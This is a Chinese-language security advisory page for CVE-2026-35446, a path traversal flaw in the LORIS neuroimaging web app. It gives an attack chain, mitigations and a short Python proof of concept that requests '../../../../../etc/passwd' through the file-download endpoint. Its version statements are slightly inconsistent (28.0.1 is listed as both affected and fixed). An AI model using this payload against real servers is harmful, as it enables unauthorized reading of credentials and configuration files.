IPBUF安全漏洞报告
English
CVE-2026-35446 CVSS 7.7 高危

CVE-2026-35446 LORIS路径遍历漏洞

披露日期: 2026-04-08
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-35446
漏洞类型
路径遍历
CVSS评分
7.7 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
LORIS (Longitudinal Online Research and Imaging System)

相关标签

路径遍历LORISCWE-22信息泄露CVSS-7.7

漏洞概述

LORIS是一个用于神经影像学研究的自托管Web应用程序。在24.0.0至27.0.3之前及28.0.1版本中,FilesDownloadHandler存在操作顺序错误。该漏洞允许攻击者绕过预期的下载目录限制,导致路径遍历攻击。攻击者利用此漏洞可访问系统上的敏感文件,造成高机密性影响。该问题已在27.0.3和28.0.1版本中修复。

技术细节

该漏洞源于LORIS的FilesDownloadHandler组件在处理文件下载请求时,未能正确校验文件路径与基准目录的包含关系。由于代码中操作顺序的错误,程序可能在验证用户权限或路径合法性之前,或者在拼接路径后未进行严格的规范化处理,导致攻击者可以通过构造包含“../”序列的恶意请求参数,突破Web根目录或预定下载目录的限制。

攻击者只需拥有低权限账户(PR:L),且无需用户交互(UI:N),即可向受影响端点发送特制的HTTP请求。成功利用后,攻击者能够读取服务器上预期范围之外的任意文件(S:C/C:H),这可能包括配置文件、源代码或其他敏感数据,从而为进一步的攻击提供关键信息。

攻击链分析

STEP 1
侦察
攻击者识别出目标系统运行的是受影响版本的LORIS应用(24.0.0至27.0.3之前或28.0.1)。
STEP 2
获取访问权限
攻击者注册或获取一个低权限账户,因为该漏洞需要低权限用户身份(PR:L)。
STEP 3
漏洞利用
攻击者向FilesDownloadHandler发送特制的HTTP请求,在文件参数中注入路径遍历序列(如../),试图访问预期下载目录之外的文件。
STEP 4
数据泄露
由于服务器未能正确处理路径顺序,成功读取并返回了敏感文件(如/etc/passwd或配置文件),导致机密性泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL configuration # The vulnerable endpoint is typically the FilesDownloadHandler target_url = "http://target-loris-site/files/download" # Attacker's low-privilege session cookie session_cookie = { "loris_cookie": "authenticated_low_priv_session_id" } # Malicious payload attempting to escape the download directory # Using ../ sequences to traverse to the root directory and read /etc/passwd payload = { "file": "../../../../../etc/passwd" } try: response = requests.get(target_url, cookies=session_cookie, params=payload) if response.status_code == 200: print("[+] Exploit successful! File content retrieved:") print(response.text) else: print(f"[-] Exploit failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

LORIS >= 24.0.0, < 27.0.3
LORIS 28.0.0

防御指南

临时缓解措施
如果无法立即升级,建议在服务器端(如Nginx或Apache)实施严格的URL过滤规则,拦截包含“../”或绝对路径特征的请求。同时,应严格限制对FilesDownloadHandler接口的网络访问权限,仅允许受信任的IP地址或内部网络访问,并加强对文件下载操作的日志审计,以便及时发现异常行为。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表